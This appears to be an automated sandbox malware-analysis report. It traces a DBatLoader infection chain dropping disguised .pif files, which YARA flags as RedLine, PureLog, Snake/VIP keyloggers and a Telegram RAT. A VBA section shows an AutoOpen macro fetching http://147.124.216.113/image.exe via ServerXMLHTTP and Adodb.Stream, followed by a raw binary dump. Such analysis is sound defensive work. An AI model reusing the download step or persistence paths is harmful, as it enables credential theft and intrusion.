Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:25:00
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\brightness.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\brightness.exe
Imagebase:	0x400000
File size:	1'161'216 bytes
MD5 hash:	483AB6BD562B28782D0999ABEC4F57F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.2213632449.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.2233031033.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:25:04
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:25:04
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:25:04
Start date:	07/01/2025
Path:	C:\Users\Public\Libraries\jphwmyiA.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\jphwmyiA.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3446215142.0000000027271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.3446215142.0000000027271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.3410702228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000002.3410702228.0000000000C20000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000001.2208904113.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000001.2208904113.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	07:25:15
Start date:	07/01/2025
Path:	C:\Users\Public\Libraries\Aiymwhpj.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Aiymwhpj.PIF"
Imagebase:	0x400000
File size:	1'161'216 bytes
MD5 hash:	483AB6BD562B28782D0999ABEC4F57F5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:25:16
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7140, Parent PID: 6728

General

Target ID:	15
Start time:	07:25:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:25:16
Start date:	07/01/2025
Path:	C:\Users\Public\Libraries\jphwmyiA.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\jphwmyiA.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000001.2321191405.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000010.00000002.3410753000.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000010.00000001.2321191405.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000002.3410753000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3446431807.000000001B4F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000002.3446431807.000000001B4F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	07:25:23
Start date:	07/01/2025
Path:	C:\Users\Public\Libraries\Aiymwhpj.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Aiymwhpj.PIF"
Imagebase:	0x400000
File size:	1'161'216 bytes
MD5 hash:	483AB6BD562B28782D0999ABEC4F57F5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:25:23
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:25:24
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:25:24
Start date:	07/01/2025
Path:	C:\Users\Public\Libraries\jphwmyiA.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\jphwmyiA.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000014.00000002.3410815376.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000014.00000002.3410815376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000014.00000001.2400403863.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3446220044.000000002B461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000014.00000002.3446220044.000000002B461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000014.00000001.2400403863.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
AutoOpenAPIs: 6, Strings: 20, Number of lines: 59, Relevance: 70.059

APIs	Meta Information
CreateObject	CreateObject("MSXML2.ServerXMLHTTP")
CreateObject	CreateObject("Adodb.Stream")
Open	IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False)
Send
responsebody	IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? 